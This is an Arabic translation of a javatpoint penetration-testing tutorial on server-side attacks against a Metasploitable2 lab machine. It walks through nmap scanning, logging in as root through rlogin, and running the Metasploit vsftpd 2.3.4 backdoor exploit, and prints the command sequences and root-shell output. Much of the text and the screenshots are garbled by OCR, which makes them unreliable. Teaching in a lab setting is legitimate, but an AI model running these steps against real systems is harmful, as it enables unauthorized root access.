مادة هذا الكتاب: 


مادة هذا الكتاب هو مجرد ترجمة لموقع 


J] a v at point .C oO Mm 
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java WV point 


مقدمة فى الوصول أو االدخول Gaining access‏ 
Introduct1on‏ 


في هذا القسم» سنلقي نظرة على كيفية الوصول لجهاز الحاسوب» عندما نقول جهاز الحاسوب نعني أي 
جهاز كهربائي مثل الهاتف أو جهاز حاسوب محمول أو تلفزيون أو شبكة أو جهاز توجيه أو موقع ويب 
أو خادم. يحتوي كل جهاز على نظام تشغيل» و هناك برامج مثبتة في أنظمة التشغيل هذه» في هذا الجزء 
سنبحث في كيفية الوصول لأجهزة الحاسوب» في هذا المثال» سوف نستخدم الحاسوب» سنخترق بجهاز 
يشتغل بنظام لينكس» والهدف سيكون بنظام وندوز» يمكننا تطبيق نفس المفاهيم إذا كنا نستهدف خادم 
NICE EE O ly,‏ 
العادي تماماء يمكننا إعداد خادم ويب على جهاز الحاسوب الخاص بناء ويمكننا أن نجعله يبدو وكأنه 


موقع ويب› أو حتى جعله يتصرف كالتلفزيون»› أو ی نریده» أجهزة التلفاز وجميع هذه الأشياء 
هي مجرد أجهزة حاسوب بسيطة بها أجهزة آقل تعقيدا. 

لا يتطلب الهجوم على الخادم أي تفاعل من جانب المستخدم يمكن استخدام هذه الهجمات على خواده 
وسنرى كيف يمكننا الوصول لهذا الحاسوب دون الحاجة لقيام المستخدم بأي شيء. ينطبق هذا الهجوم في 
الغالب على الأجهزة والتطبيقات وخوادم الويب التي لا يَرْنَذونَ عليها الكثير من الناس. 

مبدتیاء بقوم الأشخاص بتکوینهاء ثم بتم تشغیلها تلقانیاء کل ما لدینا هو عنوان 1۲. الآن» سنری كيف 


يمكننا اختبار الأمان والوصول إلى هذا الحاسوب بناءٌ على عنوان 1۲ هذا. 


من أنواع الهجمات المختلفة على الخادم: تجاوز سعة المخزن المؤقت buf ۴e١ 0۷٥٣۴1 0W(‏ 


وحقن | 50 وهجمات رفض الخدمة. 


من ناحية العميل 

هي الطريق الثانية التي سنحاول معهاء يتطلب هذا الطريق العميل الذي يستخدم هذا الحاسوب للقيام 
بشي ءِ ما» وهذا يتضمن الكثير من الأشياء مثل : فتح صورة أو فتح حصان طروادة أو تثبیت تحديث . 
سوف نتعلم كيفية انشاء باب خلفي› وكيفية انشاء حصان طروادة» وكيفية استخدام الهندسة الاجتماعية 
لجعل الشخص المستهدف يفعل شيئًا ما حتى نتمكن من الوصول إلى الحاسوب الخاصة به. في هذه 
الحالة» سيكون جمع المعلومات أمرًا بالغ الأهميةء لأننا نحتاج في الواقع إلى معرفة الشخص الذي 
نستهدفه. 

من أنواع الهجمات المختلفة على العميل: تثبيت الجلسةء والمحتوى المخادع» والبرامج النصية 


c۲1 P11 9(‏ S)عبر‏ المواقع. 


بعد استعغلال 


بمجرد وصولنا إلى الحاسوب الهدف» سنرى ما يمكننا القيام به بعد أن نتمكن من الوصول إلى هذا 
الحاسوب. قد يشمل ذلك استغلالا من جانب العميل أو استغلالا من جانب الخادم» أو حتى مجرد وصول 
مادي» حيث يغادر الضحية مكتبه» وندخل فيه. في هذا القسم» سننظر فيما يمكننا القيام به بمجرد وصولنا 
إلى الهدف. سنرى أيضًا كيف يمكننا مواصلة استغلال هذا الهدف وزيادة امتيازاتناء أو استهداف أجهزة 


حاسوب أخرى في نفس المكان. 


java WV point ۵ 


في هذا القسم» سنتحدث عن الهجمات على الخادم. لا تتطلب الهجمات على الخادم تفاعل المستخدمين. 


يمكن استخدام هذه الهجمات مع خوادم الويب. يمكننا أيضًا استخدامها ضد حاسوب عادي يستخدمه 


الأشخاص يوميًا . للقيام بهذه الهجمات» سنستهدف جهاز € | 20 آ0 | 50 14 1€ الخاص بنا. السبب 


في أننا سنستخدمه ضد جهاز € |20 25010 1 ١€‏ الخاص بنا هو أنه إذا كان هدفنا يستخدم 
جهاز حاسوب شخصي» واذا لم يكن على نفس الشبكة» فحتى لو تمكنا من الحصول على عنوان 1۲ 
الخاص به» فإن عنوان 1۴ الخاص به سيكون وراء جهاز التوجيه. من المحتمل أن يتم الاتصال من 
خلال جهاز توجيه»ء وبالتالي» إذا استخدمنا ۲ ] لمحاولة تحديد التطبيقات المثبتة وما هو نظام التشغيل 
الذي يعمل عليهاء فلن نحصل على الكثير من المعلومات المفيدة؛ لأننا سنحصل فقط على معلومات 
حول جهاز التوجيه» وليس عن الشخص. الشخص سوف يكون مختبتًا وراء جهاز التوجيه. 


عندما نستهدی خادم ويبب› سيكکون للخادم عنوان 1P‏ ويمكننا الوصول الى عنوان 1P‏ هذا مباشرة على 
الإنترنت. سيعمل هذا الهجوم إذا كان لدى الشخص عنوان 1۲ حقيقي» واذا كان الشخص على نفس 
الشبكة. إذا استطعنا إجراء اختبار ۸9 آ م للشخص» حتى لو كان جهاز حاسوب شخصي» فيمكننا تشغيل 
جميع الهجمات وجميع أساليب جمع المعلومات التي سنتعلمها. 


سنستهدف جهاز € 1 120 آ0 | 25ع« الخاص بنا. قبل أن نبدأً العمل عليه» سنقوم فقط بفحص 
إعدادات الشبكة. فقط للتحقق من ذلك» تم تعيينه على | ۸ء وهو على نفس الشبكة مثل الجهاز ١‏ | 2). 
E E EE O CT‏ 
tab €‏ 01ا asp‏ ا Me‏ فسنكون قادرين على رؤية عنوان ‏ 1 الخاص به كما هو موضح في الصورة 
التالية: 


To access official Ubuntu documentation, 
http :##help.ubuntu .conm# 
ou mall. 
sfadmin®Bmetasploitable:”? ifconf ig 
sthO Link encap:Ethernet HlWaddr OB:OO0:Z?:5f :131:0c 
inet addr:10.d0.2.4 Bcast:10.O0.2.Z255 Mask:2Z55.200.2 .0 
inet addr: feBO0::ad0d0:Z?Tf :feSf :1310c#64 Scope :Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 


please visit: 


RA packets:45 errors: dropped: overruns: frane :0 
TX packets:69 errors: dropped: overruns: carrler :0 
collisions: txqueue len : 1000 


RX bytes:û6?03 0.6 KB) TX bytes:?44 CF7. RB) 
Base address :Jxdd010 Memory :fOOOONOIOIO-f ONZOOOO 


Link encap:Local Loopback 

inet addr:lé?.0.0.1 Mask:Z255.0.0.0 

inet addr: ::1/12Z8 Scope :Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:105 errors: dropped: overruns: frame :0 
TX packets:105 errors: dropped: overruns: carrler :0 
collisions: txqueue len : 0 


RX bytes:tS5blI? LE5.O0 RBI] TR bytes:êS6l? CE5.Û0 KB} 


sfadmin®nmnetasploitable: 
أن نرى أن 10.0.2.4 هو عنوان 1۶ لجهاز‎ 
الآن» إذا ذهبنا إلى جهاز 21ء يجب أن نكون قادرين على اختبار‎ . كeاaspا0oi‎ tab ا٤‎ 
الأمر. في لقطة الشاشة التاليةء يمكننا أن نرى أنه عندما نجرب أمر 0119 على 1ء نحصل على‎ 
ردود من الجهاز . الآن» يمكننا تجربة واختبار أمانه كما هو موضح في لقطة الشاشة التالية:‎ 


فى لقطة الشاشة السابقةء يمكننا 


© & @ 


root @ kali: ~ 


File Edit View Search [Terminal Help 
:~# ping 10.0.2.4 

10.0.2.4 (10.0.2. ا‎ 56(84) bytes of data. 

Trom 10. icmp seq=1 ttl=64 time=0. 
Trom 10. icmp seq=2 ttl=64 time=0. 
Trom 10. icmp seq=3 ttl=64 time=0. 
Trom 10. icmp seq=4 ttl=64 time=0. 
Trom 10. icmp seq=5 ttl=64 time=1. 


PING 
4 bytes 
bytes 
bytes 
bytes 
bytes 


982 
530 
512A ms 
648 ms 
EDIE 


JE 
E 


E 
1E 
MS 
E 


time=0. 
time=0. 
time=0. 
time=0. 


FAI 
32 
473 
29 


6 ttl=64 


tt1=64 


8 ttl=64 


ttl=64 


icmp seq= 
icmp seq=7 
icmp seq= 
icmp_seq=9 


icmp seq=10 ttl=64 time=0. 296 ms 
icmp seq=11 ttl=64 time=0. 299 ms 


12 ttl=64 time=0. 350 ms 


icmp seq= 


LE. 
1d. 
10. 
1d. 
10. 
10. 
1d. 


a Gs Gy sm Sm aS ml SS a 


Trom 
Trom 
Trom 
Trom 
Trom 
Trom 
from 


bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 


1 :F 
12 packets transmitted, 


2.4 ping statistics =--=-- 


12 received, 0% packet loss, time 11204m5 


java WV point 


مرة أخرى» يمكننا استخدام هذه الهجمات» وهذه الأساليب ضد أي جهاز حاسوب يمكننا اختباره. تعمل 
الهجمات على الخادم ضد: جهاز حاسوب عادي» والمواقع» وخوادم الويب» والأشخاص» طالما أننا يمكن 
أن تفهمها. فقط انقل هذه الفكرة» سوف نرى جهاز € | 0 2ا 1 0 | م5 ها .١€‏ إنه مجرد جهاز افتراضي 
طبيعي یمکننا استخدامه هنا لفعل أي شيء نریده. باستخدام الأمر 5ا-» یمکننا سرده» ویمکننا حتى تثبيت 
واجهة رسومية. تم سنكون قادرين على استخدامها بالطريقة التي نستخدمها في جهاز كالي. ولكن لديه 
خادم الويب. إذا حاولنا الانتقال إلى الخادم» فسنرى أنه يحتوي على مواقع ويب يمكننا قراءتها وتصفحها 
بالفعل. سنلقي نظرة على هذه المواقع ونرى كيف يمكننا اختبارها في الفصول اللاحقة كما نرى في لقطة 
الشاشة التالية: 


Applications ¥ Places ¥ @ Firefox ESR ¥ Tue 05:40 
Metasploitable2 - Linux - Mozilla Firefox © & 08 

,/ Metasploitable2 - Linux x | + 
4) © | 1.0.24 Search tH ¥ #0 = 
E Most Visited» [Offensive Security “™, Kali Linux “ê, Kali Docs *“, Kali Tools ® Exploit-DE fy Aircrack-ngq Kali Forums *“™, NetHunter دد‎ 
E _-_ LE 

_ 7_1 _F7 ` F/F_I'_NM|/ I^ ° | '_Nl |/ _ O | 
IIIIII FIL. X*XIJIIUNIIINICLIIINID fF 
lI |_| ااا ٠ا اا ي ا ا ا‎ | 


warning: Never expose this VM to an untrusted network ! 
Contact: msfdev[at ]metasploit . com 


Login with msfadmin/msfadmin to get started 


كل شيء عبارة عن حاسوب» واذا تمكنا من اختبار اتصال ۴ء فيمكننا استخدام الهجمات من جانب 
الخادم. هذه الهجمات تعمل في الغالب ضد الخادم؛ لأن الخادم لديه دائمًا عناوين |١‏ حقيقية. إذا كان 
الشخص المستهدف موجودا في نفس الشبكة المتصلين بهاء يمكننا اختبار الأمر عليه للقيام بجميع هذه 
الهجمات أيضًا. 


أساسيات الهجوم من جانب الخاد server-side attack‏ 
basics‏ 


في هذا القسم» سنقوم بهجمات على الخادم. للقيام بذلك» سنستخدم: 

أولأً: جمع المعلومات» والذي يُستخدم لرؤية البرامج المثبتةء ونظام التشغيل للهدف» والخدمات التي تشتغل 
على الهدف» والمنفذ المرتبط بهذه الخدمات. من هذه الخدمات المثبتةء يمكننا محاولة الدخول إلى النظام. 
يمكننا القيام بذلك من خلال تجربة كلمات المرور الافتراضية. 


هناك الكثير من الأشخاص الذين يقومون بتثبيت الخدمات ويقومون بتكوينها بشكل خاطئ» لذلك سيكون 
لدينا مثال آخر على ذلك. 


المشكلة الأمنية الأولى في هذه الخادمات هي: أنه في بعض الأحيانء يتم تصميم الكثير من الخدمات 
لمنح شخص ما إمكانية الوصول عن بعد إلى ذلك الحاسوب» لكن من الواضح أنه يحتاج إلى بعض 
تطبيقات الأمان. غالبًا ما يسيء الناس تكوين هذه الخدمات» وهذا يجعلنا نتمكن من الاستفادة من هذه 
التكوينات الخاطئة والوصول إلى أجهزة الحاسوب هذه. 


مشكلة أخرى مع هذه الخادمات هي: أن البعض منهم قد يكون لديهم أبواب خلفية. مما يعني هذا أنه 
سيكون عندهم الكثير من نقاط الضعف» متل ثغرات التحكم في المخزن المؤقت ( ع1€ا۳"0٥/‏ 
(u1 ۴e۴ 0€ ۴ 1 ۷‏ أو تغرات برمجية»ء وهذا سيتيح لنا الحصول على إمكانية الوصول الكامل 
إلى نظام الحاسوب. 


إن أبسط طريقة للقيام بذلك هي شيء رأيناه من قبل» م 1۳2 €⁄. سنستخدم م ۸۳3 ع/ على ال 1۲۴ 
للمواقع الإلكترونية. باستخدام 7€13» سوف نحصل على قائمة بجميع هذه الخدمات» ثم نذهب 
للبحث في €| 6009 عن كل واحدة منها لمعرفة ما إذا كانت تحتوي على أي نقاط ضعف. لقد رأينا 
من قبل أن جهاز 01٥‏ 10 50 ]۳€ هو في الواقع موقع ويب. إذا أردنا الحصول على عنوان 
ال 1۲ الخاص بموقع الويب» فعلينا إجراء اختبار 19 آ م0. على سبيل المثال» إذا أردنا الحصول على ال 
۲ الخاص ب 00( ه۴» فعلينا كتابة الأمر ۴۹٤٥000). C0۳‏ 0109ء وسوف نحصل 
على ۲ 1 الخاص بهم. الان سنکون قادرین على تشغيل م ۳2 ⁄€۸١‏ ضد 1۲ C000)‏ ۴2 والحصول 


على قائمة بجميع الخدمات التي تشتغل على )08000 ۹ . لكن»ء في هذا القسم» سنقوم بتشغيل 
/en n7‏ ضد جهاز € | 0 12 1 0 | م5 2 ١€‏ والذي يعد في الأساس جهاز حاسوب. 


سنقوم بتشغيل م ١۳2‏ ⁄ بنفس الطريقة التي قمنا بها من قبل. لفتح م 22۸۳ء سنفتح الجهاز ونكتب 
۲0 2» وسنقوم بإظهار التطبيق. يمكننا وضع أي 1۲ الذي نريد اختباره. لكن» في هذا القسم» 
سنقوم بإدخال عنوان ۲ 1 الخاص بالهدف الخاص بناء وهو الخاص بجهاز 201€ 101| مها Me‏ 
والذي يمتثل 4 . 2 . 0 . 10 في مثالنا. نحن بصدد المسح» وهذا سيعطينا قائمة بجميع التطبيقات المثبتة 


كما هو موضح في الصورة التالية: 


Applications ¥ Places vw a Zenmap Tue 05:52 

Zenmap © & @ 
Scan Tools Profile Help 
Target: |10.0.2.4 v | Profile: (Intense scan ¥ Scan 


Command: |nmap -14 -A -v 10.0.2.4 


Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans 


OS Host y nmap -14 -4 -v 10.0.2.4 | Details) 


f 10.0.2.4 starting Nmap 7.70 ( https:/fnmap.org J at 2018-06-12 05:50 EDT 


NSE: Loaded 148 scripts for scanning. 

NSE: Script Pre-scanning. 

Initiating NSE at 05:50 

Completed NSE at 05:50, 0.005 elapsed 

Initiating NSE at 05:58 

Completed NSE at 05:50, O0.O00s elapsed 

Initiating ARP Ping Scan at 05:50 

scanning 10.0.2.4 [1 port] 

Completed ARP Ping Scan at 05:50, 0.135 elapsed (1 total hosts) 
Initiating Parallel ONS resolution of 1 host. at 05:50 

Completed Parallel ONS resolution of 1 host. at 05:50, 0.305 elapsed 
Initiating SYN Stealth Scan at 05:50 
scanning 10.0.2.4 [1000 ports] 
Discovered open port 80/tcp on 10.0.2.4 
Discovered open port 5900/tcp on 10.0.2. 
Discovered open port 3306/tcp on 10.0.2. 
Discovered open port 111,/tcp on 10.0.2.4 
Discovered open port 139/tcp on 10.0.2.4 
Discovered open port 23/tcp on 10.0.2.4 
Discovered open port 445,/tcp on 10.0.2.4 
Discovered open port 53/tcp on 10.0.2.4 
Discovered open port 21,tcp on 10.0.2.4 
2.4 
2.4 


1 
¥ 


4 
4 


Discovered open port 25/tcp on 10.0. 
Discovered open port 2#2/tcp on 10.0. 
Discovered open port 513/tcp on 10.0.2.4 
Discovered open port 2049/tcp on 10.0.2.4 
Discovered open port 514/tcp on 10.0.2.4 
Eilat ili Discovered open port 1524/tcp on 10.0.2.4 3 
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ا ر اص د دا ا ای ا ا 
أOutpu‏ مNma»‏ ونفحص المنفذ تلو الآخر» ونقراً ما هي الخوادم» ثم نذهب لجوجل ونبحث عن نوع 
الخادم لكي نرى ما هي نقاط ضعفه؛ لكي نستغلها. 


على سبيل المثالء في لقطة الشاشة التاليةء لدينا منفذ 21 وهو منفذ ۴۲۲. 


۴۶ هو: نوع من الخدمات التي تم تثبيتها للسماح للأشخاص بتحميل وتنزيل الملفات من خادم بعيد. 
عادة ما تستخدم خدمة ۴۲۲ اسم مستخدم وكلمة مرور» ولكن يمكننا أن نرى أن هذه الخدمة قد تم تكوينها 
بشکل خاطئ وآنها تسمح بتسجیل دخول ۴۲۴ مجهول. في هذاء سنکون قادرین على تسجیل الدخول 
بدون كلمة مرور» لاحظ لقطة الشاشة التالية: 


Applications w Places w «» Zenmap 


scan Tools Profile Help 


Target: |10.0.2.4 yv Profile: | Intense scan ۳ anci 


Command: nmap -T4 -A -v 10.0.2.4 


| Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans 


o05 Host y |nmap -14 -A -v 10.0.2.4 2 | Details) 
f UO. 24 Not shown: 377 closed ports 
PORT STATE SERVICE VERSION 
21/tcp open ftp vsftpd 2.3.4 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 
| ftp-syst: 
STAT: 


| FTP server status: 
Connected to 10.0.2.15 
Logged in as ftp 
TYPE: ASCII 
| No session bandwidth limit 
| Session timeout in seconds is 300 
| Control connection is plain text 
Data connections will be plain text 
| wsFTPAd #.3.4 - secure, fast, stable 
|_End of status 
22tcp open ssh OpenSSH 4.7p1 Debian Subuntul (protocol 2.0) 
| ssh-hostkey: 
| 1024 60:O0f:cf:el:cO:5T:6a:74:d6:90:24:Ta:c4:d5:6c:cd (DSA) 
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 
23/tcp open telnet Linux telnetd 
25/tep open smtp Postfix smtpd 
|_smtp-commands: metasploitable. localdomain, PIPELINING, SIZE 10240080, VRFY, ETRN, 
STARTTLS, ENHANCLEDSTATUSCODES, SBITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804- base. localdomain/organizationName=O0COsA,/ 
stateOrProvinceName=There is no such thing outside US5/countryName=Xx 
| Issuer: commonName=ubuntu804- base. localdomain/organizationName=O0COsA/ 
stateOrProvinceName=There is no such thing outside US5/countryName=Xx 

Filter Hosts | | Public Key type: rsa ” 


کل ما یتعین علینا القیام به هو تنزیل عمیل ۰۴۲۳۴ متل ھااأ⁄۲اآ۴. الآن» سوف نکون قادرین على 
الاتصال بهذا الخادم باستخدام عنوان ۴| هذا على المنفذ 21. يمكننا أيضًا البحث في ءاومم عن نوع 
خادم ۴۲۶ والذي هو 2.3.4 ۷50۵ في مثالناء ومعرفة ما إذا كان لديه أي مشاكل» أو إذا كان لديه 
أي تكوينات خاطئة»ء أو إذا لديه أي أخطاء تنفيذيه في الأكواد يمكننا أن نستغلها. بمجرد قيامنا بعمل هذا 
في 600818). یمکننا أن نری أن 2.3.4 ۷50۵ به باب خلفي مثبت علیه. 
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من حين آن تم إصداره وهو مثبت عليه باب خلفي افتراضيا. نحتاج إلى البحث عن الخوادم التي نجدها 
ونبحث عليها في 600٥818‏ واحد تلو الأخرء والتحقق مما إذا كان لديه أي تشوهات خاطئة أو أي شيء 
کننا استغلاله۔ 


ننظر الآن إلى المنفذ 512. لنفترض أننا تابعنا خادم تلو الآخر» ولم نتمكن من العثور على أي شيءء 
ووصلنا إلى منفذ 512 »1٥۴‏ كما هو موضح في لقطة الشاشة التالية: 


Applications ¥ Places ww  « Zenmap Tue 06:13 

Zenmap ا‎ x 
Scan Tools Profile Help 
Target: | 10.0.2.4 v Profile: (Intense scan Y | |Scan| 


Lommand: | nmap -14 -A -v 10.0.2.4 


| Hosts | services | Nmap Output Ports / Hosts Topology Host Details Scans 
0E ost ې‎ jnmaP -14 -A -v 10.0.2.4 3: | Details 


f 10.0.2.4 | 100024 1 56585/tcp status 


139/tcep open nethbios-ssn Samba smbd 3.X - 4,.X (workgroup: WORKGROUP ) 
445/tcp open nethbhios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP } 
S12/tcp open exec netkit-rsh rexecd 


513/tep open login 

514/tcp open tcpwrapped 

1033/tcp open Java-rmil Java RMI Registry 
1524/tcp open bindshell Metasploitable root shell 


2049/tcp open nfs 2-4 (RPC #100003) 
2121,/tcp open ftp ProFTPD 1.3.1 
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5s 


نحن الآن بصدد الذهاب إلى #اومم والبحث عن هذا الخادم الذي يعمل على منفذ 512 لأننا لا 
نعرف ما هو هذا الخادم وكيف يشتغل. بعد البحث في ٥eاوہہ6,‏ نعلم ان ٣6۸٤-٣5۸‏ ھو برنامج تنفیذ 
عن بُعد. إذا تمكنا من تسجيل الدخول باستخدام هذاء فسنكون قادرين على تنفيذ الأوامر على الحاسوب 
الهدف. یستخدم هذا البرنامج ۲۱٥9۸‏ ۲5ء وهو برنامج يأتي مع ٣×‏ اا. على غرار 588 فھذا يسمح 
لنا بتتفيذ الأوامر عن بعد على الحاسوب الهدف. 


java WV point ۵ 


دعنا نعود ونری كيف يمکننا الاتصال بخدمة ۲۶۸ .١5۸۱١‏ لنلق نظرة على حزمة ۲٤۸‏ |اKأهم.‏ ويمكننا 


أن نرى أنها اأ اطلا. يعمل الحاسوب الهدف على اأ لاطلاء ويمكننا أن نرى هنا أنه يستخدم خدمة 
عميل ۲5۸ للاتصال. لذلك» نحن بحاجة إلى تثبيت حزمة ١6۴!ااء-‏ ١5ء۲‏ للاتصال بذلك الخادم. إنه برنامج 
عميل لاتصال اا#٣ء‏ بعيد. الآن» استخدم الأمر التالي لتشيت ١ء‏ أاء-٣ك۲:‏ 


root@kali :~# apt-get install rsh-client 


أخبرتتا أنه يستخدم برنامج ۲|١9١‏ لتسهيل عملية تسجيل الدخول. سنقوم بإعادة تسجيل الدخول مرة 
أخرى» واذا لم نعرف كيفية استخدام هذا التطبيق» فيمكننا استخدام أمر م16-- لمعرفة كيفية استخدامهء 


كما هو موضح في لقطة الشاشة التالية: 


root@kali :~# rlogin —-—help 


الأشياء المهمة هنا هي اسم المستخدم (أ-) والمضيف (ا5٠٣)‏ وهو | المستهدف. الآن نحن ذاهبون 
للقيام ٥9١‏ ا٣.‏ سنضع اسم المستخدم كجذر »)٠٠١١(‏ وهو المستخدم الذي يتمتع بأكبر الامتيازات على 
النظام» وسنضع 10.0.2.4ء وهو | المستهدف. هنا الأمر: 


root@kali :~# rlogin -i root 10.0.2.4 


الآن» تم تسجيل دخولنا إلى الجهاز ءاطهأهاموها6. إذا قمنا بتنفيذ الأمر |١‏ للحصول على المعرف» 
يمكننا أن نرى آننا الجذر. إذا قمنا بتنفيذ أمر 2- 4۳8٣٠لاء‏ فسوف يعرض اسم المضيف ونواة التشغيل 
على الجهاز . يمكننا أن نرى أننا في آلة #اطةاماموةأ6 مع وصول الجذر» كما هو مبين على النحو 
التالي: 


هذه طريقة يدوية أساسية للوصول إلى الحاسوب الهدف من خلال استغلال التكوين الخاطئ للخاده 
المثبت. لم يتم تكوين خدمة ۲۱٣9۱١۸‏ بشكل صحيح. كل ما كان علينا فعله هو البحث في ءا009 فقط 


وهو الذي جاء بهذا المنفذ» وتمكنا من تسجيل الدخول والوصول إلى الحاسوب الهدف. 


الهجمات من جانب الخادم - = server-side attacks‏ 


Metasploit basics 
Metasploit اساسياٽت‎ 
في هذا القسم» ستنظر في الاستغلال البسيط للغاية الذي هو الباب الخلفي. نحن نختار هذا الاستغلال‎ 
لأننا سنرى إطار يسمى أأ0امsة6/ .ااماموهاهN هي أداة تطوير وتنفيذ استغلال.‎ 


أولاًء دعونا نلقي نظرة على كيفية العثور على هذا الاستغلال. مرة أخرى» باستخدام الطريقة نفسها التي 
کنا علیها بالفعل» لدینا فحص ۱۳2 لأننا نعلم اننا سنذهب على کل منفذ وبحث eاوممG‏ عن مآثر . 
لذلك» سنستغل ءاوهه اسم الخدمة 2.3.4 ۷50١‏ الذي يتم استغلاله بواسطة مآثر يمكننا أن نرى أن 
النتائج الأولى تأتي من موقع ۸3۲07 .۸347 هي شركة تصنع إطار عمل أاهامءه†6" » ولهذا 
السبب نختار هذه الأعمال المعينة. الآن باستخدام أأهامكهاهء سنستغل هذه الخدمة. سيخبرنا ۸207 
أن إصدار 2.3.4 من بروتوكول نقل الملفات يحتوي على تنفيذ أمر مستترء لذلك يمكننا تنفيذ الأوامر 
على الحاسوب الهدف بشكل أساسي إذا كان قد تم تثبيت هذا البرنامج. وباستخدام 2۲".» يمكننا أن 
نرى أن هذا البرنامج مثبت» مما يعني أنه يمكننا تنفيذ الأوامر على الجهاز المستهدف. 

يرصد أأهامsها6.‏ بواسطة ۸41۵7. إنه إطار ضخم يحتوي على عدد كبير من الماثر. إنها تتيح لنا 
استغلال نقاط الضعف أو إنشاء عمليات استغلال خاصة بنا. الأوامر في أأهامكةا6/ بسيطة للغاية. 
فيما يلي بعض الأوامر الأساسية: 


: msfconsole 

یتم استخدامه لتشغیل برنامج .Me sp0)‏ 

:help 

باستخدام هذا الأمر» يمكننا الحصول على معلومات حول الأوامر ووصف كيف يمكننا استخدامها. 
:show‏ 

هذا الأمر يدل على الاستغلالات المتاحة. يمكننا إظهار المساعدين المتاحين والحمولات المتاحة. 
:use‏ 


يستخدم هذا الأمر لاستخدام شيء من نتائج .5١0۷‏ على سبيل المثال» نعرض عمليات الاستغلالء 
ونختار استغلالا معينًا نريد استخدامه. ثم نستخدم الأمر 58ء ونكتب اسم الاستغلال لتشغيله. 


:set 


متك ها الاير ن غارات دة لاا لے ستل الال ا ارا تن مد ادف 
فسنقوم بتعيين المنفذ ثم ندخل قيمة المنفذ الذي نريد تعيينه عليه. 


:exploit 


ف اما تمحر ال اون ال د ك و 


تابعنا 3۴" »N‏ وعندما بحثنا في اوممت عن اسم الخادم والذي هو 2.3.4 ۷5)٥4‏ استغللناه» يمكننا 
أن نرى أن هذا الخادم لديه أوامر تنفيذيه للباب الخلفي. نظرًا لأن هذا في 1۵7م4 ۸ فإن الثغرة الأمنية 
قابلة للاستغلال باستخدام أاهامئةا6. والان سنكتب ١٥5لا‏ وبعدها سنضع اسم الثغرة. والتي هي 
.exploit.unix/ftp /vsftpd_ 234 backdoor‏ 


java W point @ 
EE 


في لقطة الشاشة التاليةء يمكننا أن نرى أن الاسم قد تم تغييره ل(أهام×6) ثم اسم الاستغلال الذي 


لنسذحدمهة: 


mst > use exploit/unix/ftp/vsftpd 234 backdoor 


msf exploit ( ) > 


ثم سنستخدم الأمر ۷٥ء‏ لإظهار الخيارات التي سنضعها. كما نعلم» 1۸0۷ء هو أمر عام يمكننا 
استخدامه في عدد من الحالات. في هذه الحالة» سوف نستخدم ١٥0اأمه "0W‏ لرؤية جميع الخيارات 
التي يمكننا تغييرها في عمليات الاستغلال المحددة هذه كما هو موضح في لقطة الشاشة المحددة: 
msf exploit ( J > show options‏ 
Module options (exploit/unix/Ttp/vsftpd 234 backdoor):‏ 
ENIS Current Setting Required Description‏ 


The target address 
RPORT #21 2 The target port (TCP) 


Exploit target: 


Id Name 


0 Automat 1C 


في لقطة الشاشة أعلاه» يمكننا أن نرى أن الخيار الثاني هو المنفذ الذي يعمل عليه الخادم. تم تعيينه 
بالفعل على المنفذ 21. الآن» إذا عدنا إلی ۵۲٣۱ء‏ فسنری أن خادم ۴۲۶ المستهدف أو العميل يعمل 
على المنفذ 21. الآن» نحن بحاجة فقط إلى تغییر ۸10581 .۸1057 هو عنوان ۴| الهدف» وسنقوم 
بتعيين ۸۳1051 سيكون عنوان ۴| لجهاز ع اطة)اماموهاهN‏ الهدف الخاص بنا. سوف نستخدم ا56 
وبعدها سنضع اسم الخيار. الآن سنقوم بتغیير R۳05‏ إلى 10.0.2.4. إذا كنا نريد تغيير المنفذء 
یمکننا ضبط 8۴0۸۲ . الأمر كالتالي: 


1 erer J 


تم اضغط 5١16١‏ الان في لقطة الشاشة التاليةء يمكننا أن نرى أن ۸R۳10581‏ وضعنا فيه 10.0.2.4 


J) > set RHOST 10.0.2.4 


msf exploit ( 
RHOST => 10.0.2.4 


الان سنکتب آأمر ۸٥اامه‏ ۷٣٥٣ء‏ مجددا فقط لنتأکد من أن کل شيء تم تکوینه بشکل صحیح» ویمکننا 
أن نرى في لقطة الشاشة التاليةء تم تغيير ۸1051 إلى 10.0.2.4: 
msf exploit ( J) > show options‏ 


Module options (exploit/unix/ftpy/vsftpd 234 backdoor): 


EIS 
RHOST 10.0.2.4 5 The target address 
RPORT #1 yes The target port (TCP) 


Exploit target : 


Id Name 


0 Automat 1C 


كل شيء جاهز . الآن» سنقوم بتنفيذ أمر ٤أ‏ ام×٠.‏ في لقطة الشاشة التاليةء يمكننا أن نرى أن الاستغلال 
قد تم تشغيله بنجاح» والآن لدينا إمكانية الوصول إلى الحاسوب الهدف. إذا علمنا الهوية (0الا)» فسنرى 
أن معرف المستخدم هو الجذر (٤هه١):‏ 


exploit ( J) = exploit 


10.0.2.4:21 - Banner: Z20 (vsFTPd 2.3.4) 

10.0.2.4:21 - USER: 331 Please specify the password. 

10.0.2.4:21 - Backdoor service has been spawned, handling... 

10.0.2.4:21 - UID: uid=O0(root) gqid=0(root) 

Found shell. 

Command shell session 1 opened (10.0.2.15:34037 -=> 10.0.2.4:6200) at 2018-06-12 23:57:21 -0400 


id 
uid=0(root) gid=0( root) 


الآن نستخدم أوامر ×ا” اا الأساسية»ء لذلك إذا قمنا ب ه- مهم ياء فسنرى أن هذا هو جهاز 
ماoitabاMetasp‏ الخاص بي. إذا كتبنا »|١‏ فسوف يسرد لنا الملفات. إذا قمنا بعمل ١۷م‏ فسيظهر 
لنا أين نحن الأن» ويمكننا استخدام أوامر لينكس لفعل أي شيء نريده على الجهاز الهدف: 


HES: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 1686 GNU/Linux 
1s 


استغلال ثغرة أمنية فى تنفيذ Exploiting a Code‏ 


Execution Vulnerability 
التعليمات البرمجيه‎ 


في هذا القسم» سنلقي نظرة أكثر تقدماً على أأهام5ه16 وسنرى كيفية استخدامها لاستغلال تغرة أمنية 
موجودة في خادم معينة. إنها تغرة أمنية في تنفيذ التعليمات البرمجية والتي ستمنحنا الوصول الكامل إلى 
